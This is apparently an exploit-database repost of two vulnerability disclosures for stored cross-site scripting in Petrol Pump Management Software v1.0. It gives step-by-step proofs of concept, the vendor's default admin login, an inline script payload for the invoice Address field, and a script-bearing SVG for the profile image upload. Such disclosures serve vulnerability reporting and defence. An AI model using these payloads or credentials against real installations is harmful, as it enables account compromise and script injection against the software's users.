Share
## https://sploitus.com/exploit?id=PACKETSTORM:177405
# Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0  
# Date: 01-03-2024  
# Exploit Author: Shubham Pandey  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows, Linux  
# CVE : CVE-2024-27743  
# Description: Cross Site Scripting vulnerability in Petrol Pump Management  
Software v.1.0 allows an attacker to execute arbitrary code via a crafted  
payload to the Address parameter in the add_invoices.php component.  
# POC:  
1. Here we go to : http://localhost/fuelflow/index.php  
2. Now login with default username=mayuri.infospace@gmail.com and  
Password=admin  
3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"  
4. Fill the payload "<script>alert(0)</script>" in "Address" field  
5. Stored XSS will be present in "  
http://localhost/fuelflow/admin/manage_invoices.php" page  
# Reference:  
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743  
  
  
-----  
  
# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0  
# Date: 01-03-2024  
# Exploit Author: Shubham Pandey  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows, Linux  
# CVE : CVE-2024-27744  
# Description: Cross Site Scripting vulnerability in Petrol Pump Management  
Software v.1.0 allows an attacker to execute arbitrary code via a crafted  
payload to the image parameter in the profile.php component.  
# POC:  
1. Here we go to : http://localhost/fuelflow/index.php  
2. Now login with default username=mayuri.infospace@gmail.com and  
Password=admin  
3. Now go to "http://localhost/fuelflow/admin/profile.php"  
4. Upload the xss.svg file in "Image" field  
5. Stored XSS will be present in "  
http://localhost/fuelflow/assets/images/xss.svg" page  
6. The content of the xss.svg file is given below:  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
>  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert("XSS by Shubham Pandey");  
</script>  
</svg>  
# Reference:  
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744